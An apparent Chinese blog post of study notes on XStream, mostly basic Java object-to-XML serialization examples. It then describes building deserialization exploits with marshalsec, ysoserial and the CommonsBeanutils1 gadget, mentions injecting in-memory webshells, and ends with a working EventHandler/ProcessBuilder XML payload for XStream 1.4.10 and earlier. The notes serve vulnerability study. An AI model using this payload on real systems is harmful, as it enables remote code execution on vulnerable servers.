xstream 相关漏洞学习

参考:

https://www.bbsmax.com/A/kmzLWkWBdG/  基本使用

https://blog.csdn.net/wenrennaoda/article/details/105564606 各版本漏洞触发原理

https://zhuanlan.zhihu.com/p/375239304

基本使用

xstream主要作用:类与XML互相转换

引入依赖

    <dependencies>
        <dependency>
            <groupId>com.thoughtworks.xstream</groupId>
            <artifactId>xstream</artifactId>
            <version>1.4.10</version>
        </dependency>
    </dependencies>

创建Student类

import java.io.Serializable;

public class Student implements Serializable {

    private int id;
    private String name;
    private String school;

    public Student() {
        // TODO Auto-generated constructor stub
    }
    public Student(int id, String name, String school) {
        super();
        this.id = id;
        this.name = name;
        this.school = school;
    }

    public int getId() {
        return id;
    }
    public void setId(int id) {
        this.id = id;
    }
    public String getName() {
        return name;
    }
    public void setName(String name) {
        this.name = name;
    }
    public String getSchool() {
        return school;
    }
    public void setSchool(String school) {
        this.school = school;
    }

    @Override
    public String toString() {
        return "Student [id=" + id + ", name=" + name + ", school=" + school + "]";
    }

}

测试SerializeXml类:数组类与XML互转

package com.ser.test;


import com.thoughtworks.xstream.XStream;

import java.io.FileInputStream;
import java.io.FileNotFoundException;
import java.io.FileOutputStream;

public class SerializeXml {
    public static void main(String[] args) {
        serializeToXml();
        System.out.println("**************************************");
        deserialize();
    }

    public static void serializeToXml() {
        FileOutputStream write = null;
        Student stu1 = new Student(10003, "claire", "hh");
        Student stu2 = new Student(10004, "leafly", "niubi");

        Student[] students = {stu1,stu2};
        XStream xstream = new XStream();
        try {
//将文流怼到文件上
            write = new FileOutputStream("myObjtoXml.txt");
//将学生对象序列化成Xml并通过流写入到文件中
            xstream.toXML(students, write);
        } catch (FileNotFoundException e) {
            e.printStackTrace();
        }
        //将序列化结果输出
        System.out.println(xstream.toXML(students));

    }

    public static void deserialize() {
        FileInputStream reader;
        XStream xstream = new XStream();

        Student[] students=null;
        try {
            reader = new FileInputStream ("myObjtoXml.txt");
            //将Xml文件反序列化为Student对象
            students=(Student[])xstream.fromXML(reader);
            if (students != null) {
                for (Student student : students) {
                    System.out.println(student);
                }
            }

        } catch (FileNotFoundException e) {

            e.printStackTrace();
        }

    }
}

运行后生成XML文件

<com.ser.test.Student-array>
  <com.ser.test.Student>
    <id>10003</id>
    <name>claire</name>
    <school>hh</school>
  </com.ser.test.Student>
  <com.ser.test.Student>
    <id>10004</id>
    <name>leafly</name>
    <school>niubi</school>
  </com.ser.test.Student>
</com.ser.test.Student-array>

测试SerializeXml类:单个类与XML互转

package com.ser.test;


import com.thoughtworks.xstream.XStream;

import java.io.FileInputStream;
import java.io.FileNotFoundException;
import java.io.FileOutputStream;

public class SerializeXml {
    public static void main(String[] args) {
        serializeToXml();
        System.out.println("**************************************");
        deserialize();
    }
    public static void serializeToXml() {
        FileOutputStream write = null;
        Student stu1 = new Student(10003, "claire", "hh");
;
        XStream xstream = new XStream();
        try {
//将文流怼到文件上
            write = new FileOutputStream("myObjtoXml.txt");
//将学生对象序列化成Xml并通过流写入到文件中
            xstream.toXML(stu1, write);
        } catch (FileNotFoundException e) {
            e.printStackTrace();
        }
        //将序列化结果输出
        System.out.println(xstream.toXML(stu1));

    }
    public static void deserialize() {
        FileInputStream reader;
        XStream xstream = new XStream();
        try {
            reader = new FileInputStream ("myObjtoXml.txt");
            Student stu1=(Student)xstream.fromXML(reader);
            System.out.println(stu1);
        } catch (FileNotFoundException e) {
            e.printStackTrace();
        }

    }
}

生成XML如下:

<com.ser.test.Student>
  <id>10003</id>
  <name>claire</name>
  <school>hh</school>
</com.ser.test.Student>

探测URLDNSLOG

POC生成

IDEA导入marshalsec项目,将ysoserial引入依赖

找到想修改的gadgets,这里以CommonsBeanutils为例子

注释掉原有的生object的逻辑,替换成调用ys的逻辑

直接保存,注释掉源代码中serializeToXml,直接反序列化,尝试解析 

 

生成依赖于CommonsBeanutils1直接执行命令的exp

如下 ,因为这里不需要借助ldap远程加载,所以顺者ys的exp生成逻辑写一遍代码,如目标的gadgets的CommonsBeanutils1,执行whoami等,如果需要注入内存马,则替换对ys的模块

其他EXP

基于EventHandler,版本要求:1.4.10 1.4.6 1.4.5

<sorted-set>
<string>foo</string>
<dynamic-proxy>
    <interface>java.lang.Comparable</interface>
    <handler class="java.beans.EventHandler">
        <target class="java.lang.ProcessBuilder">
            <command>
                <string>open</string>
                <string>/System/Applications/Calculator.app</string>
            </command>
        </target>
        <action>start</action>
    </handler>
</dynamic-proxy>
</sorted-set>

 

 

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值